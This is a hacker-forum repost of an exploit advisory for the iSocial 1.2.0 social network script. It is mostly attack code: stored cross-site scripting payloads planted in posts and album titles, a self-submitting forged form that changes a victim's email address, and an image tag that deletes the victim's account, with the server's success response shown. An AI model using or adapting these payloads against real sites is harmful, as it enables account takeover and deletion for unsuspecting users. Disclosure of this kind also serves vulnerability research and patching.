跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

iSocial 1.2.0 - Cross-Site Scripting / Cross-Site Request Forgery

精选回复

发布于
# Exploit Title: iSocial 1.2.0 - Cross-Site Scripting / Cross-Site Request Forgery
# Date: 2018-05-22
# Exploit Author: Borna nematzadeh (L0RD)
# Vendor Homepage: https://codecanyon.net/item/isocial-social-network-platform/21164041?s_rank=2
# Version: 1.2.0
# Tested on: Kali linux

# POC 1 : Cross-Site scripting:

1) Create your account and navigate to "write post".
2) Put this payload and click on "post" :
<script>alert(document.cookie)</script>
3) You will have an alert box in your page .

# POC 2 : Cross-Site Scripting:

1) Navigate to "Albums" and click on "create album"
2) In title field , put this payload :
"/><script>alert(document.cookie)</script>
3) In both cases , the payload will be executed after someone opens your
album or your profile.

# POC 3 : Cross-Site Request Forgery:
# iSocial - Social Network Platform 1.2.0 suffers from csrf vulnerability .
# Attacker can easily change user's email or delete user's account .

# Change email Exploit :

<html>
<head>
   <title>CSRF POC</title>
</head>
  <body>
    <form action="http://Target/isocial/demo/services/actionssetting/email" method="POST">
      <input type="hidden" name="em" value="lord2&#64;gmail&#46;com" />
    </form>
    <script>
        document.forms[0].submit();
    </script>
  </body>
</html>

# Result :
# html    "The information has been updated"
# status    "OK"
# message    ""

# Delete account Exploit:

<img src="
http://Target/isocial/demo/services/actionssetting/delete">
            

创建帐户或登录后发表意见

最近浏览 0

  • 没有会员查看此页面。